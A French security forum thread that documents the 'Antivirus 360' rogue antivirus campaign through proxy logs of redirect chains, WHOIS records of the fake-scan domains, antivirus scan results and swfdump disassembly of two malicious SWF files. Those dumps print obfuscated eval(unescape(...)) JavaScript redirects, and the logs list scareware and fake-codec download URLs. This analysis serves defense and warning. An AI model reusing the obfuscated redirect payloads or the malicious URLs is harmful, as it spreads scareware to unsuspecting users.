Antivirus 360 / Antivirus360

Listes des différents Rogues/Scareware
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Antivirus 360 / Antivirus360

par Malekal_morte »

Antivirus 360 est un rogue (faux anti-spyware) qui s'installe sans permission, le malware affiche de fausses alertes vous indiquant que vous êtes infecté par un spyware et vous recommande d'acheter ce faux anti-spyware pour soit disant désinfecter votre ordinateur.

Image

Image

Quelques exemples de captures des Fausses pages de scan/alerte de sécurité

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

1229096776.925   1092 192.168.1.63 TCP_MISS/302 286 GET http://antivirusrapid-scanner.com/360/1/freescan.php?nu=880065 - DIRECT/74.86.200.150 text/html
1229096777.103    178 192.168.1.63 TCP_MISS/200 2264 GET http://antivirusrapid-scanner.com/360/1/fr/freescan.php?sid=880065 - DIRECT/74.86.200.150 text/html
1229096777.199      2 192.168.1.63 TCP_MEM_HIT/200 989 GET http://antivirusrapid-scanner.com/360/1/fr/window.js - NONE/- application/javascript
1229096780.823    382 192.168.1.63 TCP_MISS/200 10945 GET http://antivirusrapid-scanner.com/360/1/fr/_freescan.php?sid=880065 - DIRECT/74.86.200.150 text/html
Domain Name: ANTIVIRUSRAPID-SCANNER.COM
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.FREEYOURDNS.COM
Name Server: NS2.FREEYOURDNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 10-dec-2008
Creation Date: 10-dec-2008
Expiration Date: 10-dec-2009


Registrant Contact:
Privat person
Pavel Nikulin [email protected]
+74952674385 fax: +74952674385
ul. Druzbi narodov 87-34
Moskva Moskovskay oblsat 113765
ru

Administrative Contact:
Pavel Nikulin [email protected]
+74952674385 fax: +74952674385
ul. Druzbi narodov 87-34
Moskva Moskovskay oblsat 113765
ru

Technical Contact:
Pavel Nikulin [email protected]
+74952674385 fax: +74952674385
ul. Druzbi narodov 87-34
Moskva Moskovskay oblsat 113765
ru

Billing Contact:
Pavel Nikulin [email protected]
+74952674385 fax: +74952674385
ul. Druzbi narodov 87-34
Moskva Moskovskay oblsat 113765
ru

DNS:
ns1.freeyourdns.com
ns2.freeyourdns.com

Code : Tout sélectionner

1229096812.821     96 192.168.1.63 TCP_MISS/200 2911 GET http://securedupdatedownloads.com/download/av_360glof.exe - DIRECT/84.16.231.181 application/x-msdownload
1229096812.924     90 192.168.1.63 TCP_MISS/200 2911 GET http://securedupdatedownloads.com/download/av_360glof.exe - DIRECT/84.16.231.181 application/x-msdownload
1229096851.546  38610 192.168.1.63 TCP_MISS/200 2027848 GET http://securedupdatedownloads.com/download/av_360glof.exe - DIRECT/84.16.231.181 application/x-msdownload
Domain Name: SECUREDUPDATEDOWNLOADS.COM
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.FREEYOURDNS.COM
Name Server: NS2.FREEYOURDNS.COM
Name Server: NS3.FREEYOURDNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 04-dec-2008
Creation Date: 03-dec-2008
Expiration Date: 03-dec-2009


Registrant Contact:
Private person
Vladimir Nevskiy [email protected]
+14169793421 fax: +14169793421
345 Wilmington ave unt2
Toronto ON M3H 5K2
ru

Administrative Contact:
Vladimir Nevskiy [email protected]
+14169793421 fax: +14169793421
345 Wilmington ave unt2
Toronto ON M3H 5K2
ru

Technical Contact:
Vladimir Nevskiy [email protected]
+14169793421 fax: +14169793421
345 Wilmington ave unt2
Toronto ON M3H 5K2
ru

Billing Contact:
Vladimir Nevskiy [email protected]
+14169793421 fax: +14169793421
345 Wilmington ave unt2
Toronto ON M3H 5K2
ru

DNS:
ns1.freeyourdns.com
ns2.freeyourdns.com
ns3.freeyourdns.com
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Même adresse email et registrar que pour les fausses pages de scan du rogue Antivirus 2009 : http://forum.malekal.com/viewtopic.php? ... 15#p123104

C'est la fin de l'année.... Antivirus 360 successeur d'Antivirus 2009 ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

1229259098.870   5475 192.168.1.63 TCP_MISS/302 288 GET http://protectionquickscanner.com/360/1/freescan.php?nu=77043316 - DIRECT/74.86.200.150 text/html
Referer :

Code : Tout sélectionner

1229250359.065 192.168.1.62 http://www.tinydl.com/page/573/ http://serv.clicksor.com/serving/links.php?[removed]
1229250359.661 192.168.1.62 http://serv.clicksor.com/serving/links.php?[removed] http://serv.clicksor.com/serving/tracking_id.php
1229250360.444 192.168.1.62 http://serv.clicksor.com/serving/links.php?[removed] http://www.directrdr.com/vtrack.php?[removed]
1229250401.203 192.168.1.62 http://serv.clicksor.com/serving/links.php?[removed] http://traffic-ex.com/?dir=dcpv&page=ronpogo
1229250407.632 192.168.1.62 http://serv.clicksor.com/serving/links.php[removed] http://trusted-liveclicks.com/soft.php?aid=043316&d=1&product=XPA&refer=998e36560
1229250416.689 192.168.1.62 http://serv.clicksor.com/serving/links.php?[removed] http://protectionquickscanner.com/360/1/freescan.php?nu=77043316
On applaudit encore clicksor.com qui redige vers des popups de fausses alertes....
Cette régie est aussi à l'origine de l'infection ya-tracker.com

Régie de publicité à éviter.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Une fenêtre style faux codec avec utilisation de fichiers SWF pour rediriger, chose assez rare pour être souligné.
(Déjà utilisé en partie sur ce post : http://forum.malekal.com/viewtopic.php?f=62&t=14869)

Image

Le SWF contient un javascript offusqué :

Code : Tout sélectionner

[email protected]:/tmp$ swfdump -D movie.swf 
[HEADER]        File version: 5
[HEADER]        File is zlib compressed. Ratio: 81%
[HEADER]        File size: 241 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 320.00
[HEADER]        Movie height: 240.00
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[00c]       206 DOACTION
                 (  182 bytes) action: Constantpool(3 entries) String:"this" String:"javascript:eval(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B'))" String:"getURL"
                 (    9 bytes) action: Push Lookup:1 ("javascript:eval(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B'))") int:1 Lookup:0 ("this")
                 (    0 bytes) action: GetVariable
                 (    2 bytes) action: Push Lookup:2 ("getURL")
                 (    0 bytes) action: CallMethod
                 (    0 bytes) action: Pop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END
Ce dernier redirige vers un rotator (m08b.com) qui lui même redirge vers une fausse page de scan faisant la promotion du rogue Antivirus 360.

Code : Tout sélectionner

1229343160.618    525 192.168.1.120 TCP_MISS/200 614 GET http://772983.2009dengi.com/site/movie.swf - DIRECT/64.27.5.44 application/x-shockwave-flash
1229343167.270    255 192.168.1.120 TCP_MISS/302 750 GET http://m08b.com/in.cgi?default - DIRECT/84.16.251.238 text/html
1229343170.929   1602 192.168.1.120 TCP_MISS/302 357 GET http://allpowerclicks.com/soft.php?aid=0017&d=1&product=XPA&refer=f912f48a0 - DIRECT/74.86.200.148 text/html
1229343172.821    360 192.168.1.120 TCP_MISS/302 286 GET http://security-audit-scanner.com/360/1/freescan.php?nu=880017 - DIRECT/74.86.200.151 text/html
1229343172.992    170 192.168.1.120 TCP_MISS/200 2264 GET http://security-audit-scanner.com/360/1/fr/freescan.php?sid=880017 - DIRECT/74.86.200.151 text/html
1229343178.109    119 192.168.1.120 TCP_MISS/200 979 GET http://security-audit-scanner.com/360/1/fr/window.js - DIRECT/89.149.197.248 application/javascript
1229343182.681    192 192.168.1.120 TCP_MISS/200 10945 GET http://security-audit-scanner.com/360/1/fr/_freescan.php?sid=880017 - DIRECT/89.149.197.248 text/html
1229343184.217   1109 192.168.1.120 TCP_MISS/200 36853 GET http://security-audit-scanner.com/360/1/fr/fileslist.js - DIRECT/74.86.200.151 application/javascript
1229343184.413    191 192.168.1.120 TCP_MISS/200 2317 GET http://security-audit-scanner.com/360/1/fr/progressbar2.js - DIRECT/74.86.200.151 application/javascript
1229343184.624    210 192.168.1.120 TCP_MISS/200 1578 GET http://security-audit-scanner.com/360/1/fr/common.js - DIRECT/74.86.200.151 application/javascript
Fichier movie.swf reçu le 2008.12.15 11:02:36 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 0/38 (0%)

Antivirus Version Dernière mise à jour Résultat
AhnLab-V3 2008.12.12.2 2008.12.15 -
AntiVir 7.9.0.45 2008.12.15 -
Authentium 5.1.0.4 2008.12.14 -
Avast 4.8.1281.0 2008.12.14 -
AVG 8.0.0.199 2008.12.14 -
BitDefender 7.2 2008.12.15 -
CAT-QuickHeal 10.00 2008.12.15 -
ClamAV 0.94.1 2008.12.15 -
Comodo 754 2008.12.14 -
DrWeb 4.44.0.09170 2008.12.15 -
eSafe 7.0.17.0 2008.12.14 -
eTrust-Vet 31.6.6258 2008.12.12 -
Ewido 4.0 2008.12.14 -
F-Prot 4.4.4.56 2008.12.14 -
F-Secure 8.0.14332.0 2008.12.15 -
Fortinet 3.117.0.0 2008.12.14 -
GData 19 2008.12.15 -
Ikarus T3.1.1.45.0 2008.12.15 -
K7AntiVirus 7.10.553 2008.12.13 -
Kaspersky 7.0.0.125 2008.12.15 -
McAfee 5464 2008.12.14 -
McAfee+Artemis 5464 2008.12.14 -
Microsoft 1.4205 2008.12.15 -
NOD32 3691 2008.12.14 -
Norman 5.80.02 2008.12.12 -
Panda 9.0.0.4 2008.12.14 -
PCTools 4.4.2.0 2008.12.14 -
Prevx1 V2 2008.12.15 -
Rising 21.08.01.00 2008.12.15 -
SecureWeb-Gateway 6.7.6 2008.12.15 -
Sophos 4.36.0 2008.12.15 -
Sunbelt 3.2.1801.2 2008.12.11 -
Symantec 10 2008.12.15 -
TheHacker 6.3.1.4.188 2008.12.14 -
TrendMicro 8.700.0.1004 2008.12.15 -
VBA32 3.12.8.10 2008.12.14 -
ViRobot 2008.12.15.1517 2008.12.15 -
VirusBuster 4.5.11.0 2008.12.14 -
Information additionnelle
File size: 196 bytes
MD5...: a41f65f04650399149245a708b3bd39e
SHA1..: 9bcf51187d4e5939f5466b4c93b715499e772daa
EDIT :
Avira :
The file 'movie.swf' has been determined to be 'MALWARE'. Our analysts named the threat EXP/SWF.Download.BY. The term "EXP/" denotes malware that is able to detect and use certain security vulnerabilities whereby the attacker can get control of the system.Detection will be added to our virus definition file (VDF) with one of the next updates.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

1229451482.356    479 192.168.1.25 TCP_MISS/200 10945 GET http://onlinesecurityscanner.com/360/1/fr/_freescan.php?sid=880135 - DIRECT/64.20.38.90 text/html

Code : Tout sélectionner

1229451553.911   5632 192.168.1.25 TCP_MISS/302 288 GET http://onlineantivirus-scanner.com/360/1/freescan.php?nu=77029203 - DIRECT/89.149.197.248 text/html
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

http://trustedlive-clicks.com/soft.php?aid=0460&d=1&product=XPA&refer=2085b96f2 DIRECT/89.149.197.248

Code : Tout sélectionner

http://truthspring.info/wp-content/plugins/postinfo/prototype.js DIRECT/69.89.27.230

Code : Tout sélectionner

http://internetprosystemclicks.com/soft.php?aid=0135&d=1&product=XPA&refer=3e6376a25 DIRECT/69.10.49.194

Code : Tout sélectionner

http://security-www-clicks.com/soft.php?aid=0899&d=1&product=XPA&refer=58e6477af DIRECT/78.46.216.238
~~~

Code : Tout sélectionner

http://onlinemalwarescanner.com/360/1/fr/_freescan.php?sid=880460 DIRECT/89.149.217.194

Code : Tout sélectionner

http://onlinesecurity-scan.com/360/1/fr/freescan.php?sid=880775 DIRECT/89.149.197.248

Code : Tout sélectionner

http://online-securityscan.com/360/1/freescan.php?nu=880135 DIRECT/69.10.44.207

Code : Tout sélectionner

http://onlinesecurity-scanner.com/360/1/freescan.php?nu=880899 DIRECT/78.46.216.238
Change de mail en [email protected]
Registrant Contact:
Privat person
Oleg Sobolev [email protected]
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru

Administrative Contact:
Oleg Sobolev [email protected]
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru

Technical Contact:
Oleg Sobolev [email protected]
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru

Billing Contact:
Oleg Sobolev [email protected]
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru

DNS:
ns1.managehostdns.com
ns2.managehostdns.com
ns3.managehostdns.com
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

http://prosecurityclicks.com/soft.php?aid=0065&d=1&product=XPA&refer=e52ace9f9 DIRECT/89.149.197.248
http://powerantivirusscanner.com/360/1/freescan.php?nu=880065 DIRECT/89.149.197.248
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Encore un SWF...

Code : Tout sélectionner

1229896220.666    227 192.168.1.25 TCP_MISS/304 292 GET http://sudyjo.homedns.org/bafaz/blog.swf - DIRECT/85.17.224.149 -
qui redirige vers la fausse page de scan Antivirus 360.

Code : Tout sélectionner

1229896221.302    310 192.168.1.25 TCP_MISS/302 405 GET http://sudyjo.homedns.org/?ref=/ - DIRECT/85.17.224.149 text/html
1229896221.491    134 192.168.1.25 TCP_MISS/302 354 GET http://security-www-clicks.com/soft.php?aid=0823&d=1&product=XPA&refer=7c8f91057 - DIRECT/78.46.216.238 text/html
1229896222.181    358 192.168.1.25 TCP_MISS/302 286 GET http://anti-viruspcscanner.com/360/1/freescan.php?nu=880823 - DIRECT/78.46.216.238 text/html
1229896222.238     56 192.168.1.25 TCP_MISS/200 2264 GET http://anti-viruspcscanner.com/360/1/fr/freescan.php?sid=880823 - DIRECT/78.46.216.238 text/html

Le SWF contient un javascript offusqué

Code : Tout sélectionner

[email protected]:/tmp$ swfdump -d blog.swf 
[HEADER]        File version: 5
[HEADER]        File is zlib compressed. Ratio: 72%
[HEADER]        File size: 313 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 320.00
[HEADER]        Movie height: 240.00
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
                -=> ff ff ff                                            ÿÿÿ
[00c]       278 DOACTION
                -=> 88 fe 00 03 00 74 68 69 73 00 6a 61 76 61 73 63     ˆþ...this.javasc
                -=> 72 69 70 74 3a 65 76 61 6c 28 75 6e 65 73 63 61     ript:eval(unesca
                -=> 70 65 28 27 25 37 37 25 36 39 25 36 65 25 36 34     pe('%77%69%6e%64
                -=> 25 36 66 25 37 37 25 32 65 25 36 63 25 36 66 25     %6f%77%2e%6c%6f%
                -=> 36 33 25 36 31 25 37 34 25 36 39 25 36 66 25 36     63%61%74%69%6f%6
                -=> 65 25 32 30 25 33 64 25 32 30 25 32 32 25 32 66     e%20%3d%20%22%2f
                -=> 25 32 66 25 37 33 25 37 35 25 36 34 25 37 39 25     %2f%73%75%64%79%
                -=> 36 61 25 36 66 25 32 65 25 36 38 25 36 66 25 36     6a%6f%2e%68%6f%6
                -=> 64 25 36 35 25 36 34 25 36 65 25 37 33 25 32 65     d%65%64%6e%73%2e
                -=> 25 36 66 25 37 32 25 36 37 25 35 63 25 32 66 25     %6f%72%67%5c%2f%
                -=> 33 66 25 37 32 25 36 35 25 36 36 25 33 64 25 32     3f%72%65%66%3d%2
                -=> 37 25 32 62 25 36 34 25 36 66 25 36 33 25 37 35     7%2b%64%6f%63%75
                -=> 25 36 64 25 36 35 25 36 65 25 37 34 25 32 65 25     %6d%65%6e%74%2e%
                -=> 37 32 25 36 35 25 36 36 25 36 35 25 37 32 25 37     72%65%66%65%72%7
                -=> 32 25 36 35 25 37 32 25 32 62 25 32 37 25 32 66     2%65%72%2b%27%2f
                -=> 25 32 32 25 33 62 27 29 29 00 67 65 74 55 52 4c     %22%3b')).getURL
                -=> 00 96 09 00 08 01 07 01 00 00 00 08 00 1c 96 02     .–............–.
                -=> 00 08 02 52 17 00                                   ...R..
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END
Fichier blog.swf reçu le 2008.12.21 22:48:31 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 0/38 (0%)

Antivirus Version Dernière mise à jour Résultat
AhnLab-V3 2008.12.19.3 2008.12.21 -
AntiVir 7.9.0.45 2008.12.21 -
Authentium 5.1.0.4 2008.12.21 -
Avast 4.8.1281.0 2008.12.21 -
AVG 8.0.0.199 2008.12.21 -
BitDefender 7.2 2008.12.21 -
CAT-QuickHeal 10.00 2008.12.20 -
ClamAV 0.94.1 2008.12.20 -
Comodo 793 2008.12.21 -
DrWeb 4.44.0.09170 2008.12.21 -
eSafe 7.0.17.0 2008.12.21 -
eTrust-Vet 31.6.6271 2008.12.20 -
Ewido 4.0 2008.12.21 -
F-Prot 4.4.4.56 2008.12.21 -
F-Secure 8.0.14332.0 2008.12.21 -
Fortinet 3.117.0.0 2008.12.21 -
GData 19 2008.12.21 -
Ikarus T3.1.1.45.0 2008.12.21 -
K7AntiVirus 7.10.560 2008.12.20 -
Kaspersky 7.0.0.125 2008.12.21 -
McAfee 5471 2008.12.21 -
McAfee+Artemis 5471 2008.12.21 -
Microsoft 1.4205 2008.12.21 -
NOD32 3709 2008.12.20 -
Norman 5.80.02 2008.12.19 -
Panda 9.0.0.4 2008.12.21 -
PCTools 4.4.2.0 2008.12.21 -
Prevx1 V2 2008.12.21 -
Rising 21.08.62.00 2008.12.21 -
SecureWeb-Gateway 6.7.6 2008.12.21 -
Sophos 4.37.0 2008.12.21 -
Sunbelt 3.2.1801.2 2008.12.11 -
Symantec 10 2008.12.21 -
TheHacker 6.3.1.4.195 2008.12.20 -
TrendMicro 8.700.0.1004 2008.12.19 -
VBA32 3.12.8.10 2008.12.21 -
ViRobot 2008.12.20.1528 2008.12.21 -
VirusBuster 4.5.11.0 2008.12.21 -
Information additionnelle
File size: 227 bytes
MD5...: 63f04e7f40549277916fbf106be9578d
SHA1..: ec35accfc9078d0a8104759e2c3af8a895c7f02a

A noter que le site qui redirige héberge aussi un Faux Codec à l'adresse hxxp://sudyjo.homedns.org/bafaz/video/TubePlayer.ver.6.21356.exe

13 @ VT.

Tubecodec se trouve aussi à l'adresse : hxtp://downloadallsoft-now.com/TubePlayer.ver.6.21356.exe
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

1229982519.479    376 192.168.1.63 TCP_MISS/302 389 GET http://cleanredirec1.net/1/?wmid=totosamzz - DIRECT/64.86.16.3 text/html
1229982520.206    633 192.168.1.63 TCP_MISS/302 382 GET http://clickadsystem.com/soft.php?aid=0065&d=1&product=XPA&refer=e52ace9f9 - DIRECT/91.211.64.68 text/html

Code : Tout sélectionner

1229982525.713    266 192.168.1.63 TCP_MISS/302 288 GET http://antiviruscomputerscan.com/360/1/freescan.php?nu=880065 - DIRECT/91.211.64.68 text/html
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

1233087711.205    253 192.168.1.25 TCP_MISS/200 20055 GET http://antispyware-online-scan.com/promo/1/freescan.php?nu=77025303 - DIRECT/195.24.78.186 text/html
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Code : Tout sélectionner

1233088281.830    235 192.168.1.25 TCP_MISS/200 20154 GET http://antispywareonlineproscan.com/promo/1/freescan.php?nu=880848 - DIRECT/78.46.216.237 text/html
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 112083
Inscription : 10 sept. 2005 13:57

Re: Antivirus 360 / Antivirus360

par Malekal_morte »

Antivirus 360 revient à la charge depuis une semaine

Code : Tout sélectionner

1234286987.447    439 192.168.1.25 TCP_MISS/302 414 GET http://advertisenetworking.cn/soft.php?aid=025301&d=1&refer=729adbe66 - DIRECT/83.133.126.201 text/h
tml
1234286987.817    254 192.168.1.25 TCP_MISS/200 20055 GET http://antimalwareinternetscan.com/promo/1/freescan.php?nu=77025301&back=%3DTQ51DDyNcMOMI%3DO - DI
RECT/195.24.78.186 text/html
Domain Name: ANTIMALWAREINTERNETSCAN.COM
Registrar: TODAYNIC.COM, INC.
Whois Server: whois.todaynic.com
Referral URL: http://www.NOW.CN
Name Server: NS1.AIRFLYSUPPORT.COM
Name Server: NS2.AIRFLYSUPPORT.COM
Name Server: NS3.AIRFLYSUPPORT.COM
Status: clientTransferProhibited
Updated Date: 06-feb-2009
Creation Date: 29-jan-2009
Expiration Date: 29-jan-2010
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Rogues/Scareware & Programmes douteux »